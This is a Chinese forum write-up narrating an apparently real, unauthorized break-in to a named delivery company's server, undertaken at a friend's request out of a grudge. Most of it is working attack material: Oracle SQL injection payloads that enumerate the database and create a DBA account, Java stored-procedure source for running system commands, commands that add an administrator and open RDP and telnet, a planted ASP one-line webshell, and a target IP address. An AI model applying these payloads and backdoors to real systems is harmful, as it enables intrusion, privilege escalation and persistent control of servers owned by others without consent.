原创]对著名快递公司的一次艰难的oracle注入
文章作者:rebeyond
信息来源:邪恶八进制信息安全团队()
● 轻车熟路
一个
对X飞鸿有意见的亲密朋友找我说能不能把这个公司的网站给搞了,我一听公司,心想,企业站都是垃圾,好搞,便痛快答应(人品真好!),呵呵,但是后来才发现没我想像的那么简单。
站面如图:
![]()
asp的页面,啊d和google扫注入点没有,意料之中,工具误差太大!于是旁注,结果只有这一个站,然后便边开着流光扫服务器边习惯性的去站上乱逛去手工找注入点,一会的功夫出来一条链接,如图:
![]()
习惯性的单引号,如图:
![]()
很
明显的注入,猜测源码大体是这样的:select XX from XXX where
wen='云南';而且数据库类型为oracle,顿时来了精神,很少有这种练手的机会!估计服务器配置肯定不错!由于这种类型的数据库没什么好的工具,
就直接来手工吧,那样比较刺激,据我朋友说这个公司很大,网络也很大,数据库量更是大上加大,难怪用oracle呢,所以放弃后台提权的想法!
先用
union查询确定字段数和暴一些敏感资料,提交如下url:=四川省' order by 20--;返回正确,说明此表字段名大于20,继续提交=四川省' order by 30--;仍然返回正确,经过一些列的猜测然后提交,49返回正确,50出错,确定字段为49个,然后提交以下url:=四川省' union select NULL,NULL,……,NULL from dual-中间省略,一共49个null, 由于union查询需要数据类型匹配,否则出错,所以这里用null而不用数字可以避免类型错误,然后提交=四川省' and 1=2 union select 1,NULL,……,NULL from dual--;出错显示类型不匹配,换成=四川省' and 1=2 union select '1',NULL,……,NULL from dual--;返回正确,说明第一个是字符型的,但是下面对应位置并没有显示,继续按以上方法尝试后面48个,当试到12和13时,下面对应位置显示了,如图:
![]()
好了,现在我们就要用下面那两个地方爆我们需要的东西,看下oracle版本,提交=四川省' and 1=2 union select '1',NULL,……,'11', (select banner from sys.v_$version where rownum=1),'13'……NULL from dual--;
结果如图:
![]()
继续提交select member from v$logfile where rownum=1获得操作系统版本,
如图
![]()
确定是windows,下面查看服务器sid,提交select instance_name from v$instance
如图
![]()
待会远程连接要用的,下面确定下主机ip,telnet 漏洞页上显示的ip地址的1521端口,为oracle的端口,
,成功,1521开放,下面就本地架设个oracle客户端,利用oracle的那些默认帐号密码登录,尝试n次均失败告终,管理员安全意思不错,表扬
下!^.^
下面就利用oracle的内置函数SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES过滤不严的漏
洞,至于这个函数的具体漏洞形成的原因,这里就不占篇幅了,想知道的可以去我博客,对oracle不熟悉的可以跳过这一部分,继续构造提交:=
四川省
'%20and%20''||SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE
IMMEDIATE ''DECLARE PRAGMA%20AUTONOMOUS_TRANSACTION;BEGIN EXECUTE
IMMEDIATE ''''CREATE USER REBEYOND IDENTIFIED BY
REBEYOND'''';END;'';END;--','SYS',0,'1',0)=''--;
这里讲解下,and后面把函数求逻辑或然后与空比
较,这样系统会先求函数值,便会执行我们构造在函数里的语句,这样就往数据库加了个用户名为rebeyond密码为rebeyond的用户,然后执行=
四川省' and
''||SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE
IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE
IMMEDIATE ''''grant sysdba to
rebeyond'''';END;'';END;--','SYS',0,'1',0)=''--便把我们建的用户加为dba权限,下面赋予用户远程连
接权限,提交=
四川省' and
''||SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE
IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE
IMMEDIATE ''''GRANT CONNECT TO
rebeyond'''';END;'';END;--','SYS',0,'1',0)=''--,好了,下面远程连接!
● 峰回路转
本以为建了dba权限的用户,远程连接继续拿权限就完了,但是当我以dba身份登录时却出现这个,如图:
![]()
百度了下才知道是服务器那边配置的问题,由于是服务器端的问题,一时不好解决,就暂时先用normal方式登录,连接成功,进去去权限设置那把权限能勾的都勾上,如图:
![]()
因为我们毕竟是dba权限的,虽然没以dba方式登录,但是除了开关数据库,其他权限还是都有的,然后就是想办法提权拿服务器,虽然oracle不支持
xp_cmdshell直接执行系统命令,但是对plsql的支持是非常另人激动的,因为可以通过建立java存储过程来执行命令,注意这时建完
shell后要对数据库用户赋予对磁盘文件操作的权限(在sqlplus里执行):call
dbms_java.grant_permission('REBEYOND','java.io.FilePermission','c:/a.txt','read,write'); 。
cmd打开sqlplus(和oracle客户端一起安装的),输入sqlplus /nolog,然后输入connect
[email=rebeyond/rebeyond@(description=(address_list=(address=
(protocol=tcp)(host=211.154.103.15)(port=1521)))(connect_data=
(SERVICE_NAME=ORCL]rebeyond/rebeyond@(description=(address_list=
(address=(protocol=tcp)(host=211.154.103.15)(port=1521)))(connect_data=
(SERVICE_NAME=ORCL[/email])));是不是用到了我们前面爆出的服务器sid呢,hoho,连接成功,下面开始执行命令,创建
java存储过程,代码如下:
java存储过程:
第一步:
create or replace and compile
java souRCe named "util"
as
import java.io.*;
import java.lang.*;
public class util extends Object
{
public static int RunThis(String args)
{
Runtime rt = Runtime.getRuntime();
int RC = -1;
try
{
Process p = rt.exec(args);
int bufSize = 4096;
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
int len;
byte buffer[] = new byte[bufSize];
// Echo back what the program spit out
while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len);
RC = p.waitFor();
}
catch (Exception e)
{
e.printStackTrace();
RC = -1;
}
finally
{
return RC;
}
}
}
第二步:
create or replace
function RUN_CMz(p_cmd in varchar2) return number
as
language java
name 'util.RunThis(java.lang.String) return integer';
第三步:
create or replace procedure RC(p_cmd in varChar)
as
x number;
begin
x := RUN_CMz(p_cmd);
end;
创建完之后,就可以通过x := RUN_CMz(dos命令)来执行系统命令了。
建 完存储过程后系统命令执行成功, 如图
![]()
但是后来发现这个shell很不爽,如果遇到需要交互的命令就会卡死,刚开始想用"ftp 我的ip地址"检测下能不能执行,结果卡死,我这边防火墙也没反应,不解,后tasklist,发现,
确定对方不能连接外网,可能有防火墙或作了设置.
于是用ftp传马思路抛弃,打个systeninfo命令看下系统,是2003,于是打算先建个超级用户
然后开3389,执行exec :x := RUN_CMD('net user')结果卡死,猜测net被删,执行exec :x :=
RUN_CMD('net1 user');成功,执行exec :x := RUN_CMD('net1 user rebeyond
rebeyond /add&net1 localgroup administrators rebeyond
/add');成功,下面用reg命令读下3389的状态和端口,执行exec :x := RUN_CMD('reg query
"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal
Server"');发现fDenyTSconnections值为1,说明3389关闭
于是依次执行以下语句开3389:
reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal
ServerWdsrdpwdTdstcp" /v PortNumber /t REG_DWORD /d 3389 /f
reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal
ServerWinStationsRDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
因为cmd一交互就卡死,所以加了个/f强行参数,搞定后运行mstsc连接,结果另人吐血,能连上但是却没有登录窗口,提示说什么"
awgina.dll被替换成未知版本",猜测可能把3389用到的dll给删除了,因为虽然不能登录但可以连接,于是想到了替换sethc.exe,在
shell下依次执行:
exec :x :=RUN_CMD ('del c:windowssystem32sethc.exe /f')
exec :x :=RUN_CMD('del C:WINDOWSsystem32dllcachesethc.exe /f')
exec :x :=RUN_CMD('copy c:window***plorer.exe c:windowssystem32sethc.exe')
按五次shift后发现没替换成功,也没删除成功,推断原因只有一个,就是没权限,但是我在前面用java建shell前专门赋予了权限的,不解,百度一
番!发现赋予文件操作权限必须得以dba的方式登录,但是前面说了我们无法以dba方式登录,顿时大脑一片空白,没有写和删除权限,只有运行权限,思路一
下少了很多,继续!!忽然想到了telnet,用reg查看了下telnet服务的状态为禁用,于是执行reg add
"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTlntSvr" /v Start
/t REG_DWORD /d 2 /f把telnet服务设置为自动,然后就是想办法让服务器重启开telnet。
●柳暗花明:
shell里执行rundll32.exe
user.exe,restartwindows,不一会主机重启了,成功telnet,这样权限我们已经拿到了!但是要向图像界面进军,在telnet
执行netstat
-an看了下端口,发现5632,熟悉提权的人应该很熟悉,这是pcanywhere的默认端口,但是怎么才能知道pcanywhere的密码呢?因为不
能连接外网,所以直接传cif文件是不可能的,于是想到了webshell!在telnet里找到站的 目录d:site,执行echo
"<%eval(request("#"))%>"
>d:siteguestboook.asp,访问成功,然后用海洋一句话提交大马成功如图:
![]()
跳转到pcanywhere的cif文件目录下载cif文件并破解,成功得到pcanywhere的密码,如图:
![]()
到这基本就结束了,但是pcanywhere远程很不爽,于是还是想开用3389,于是百度搜索原因,发现是3389和pcanywhere冲突的原因
并找到了解决办法,删除某个注册表项就搞定了,在pcanywhere操作就很简单了,搞定后重启服务器,连接对方3389,终于看到了熟悉的登录界面,
用前面建的用户成功登入!如图:
![]()
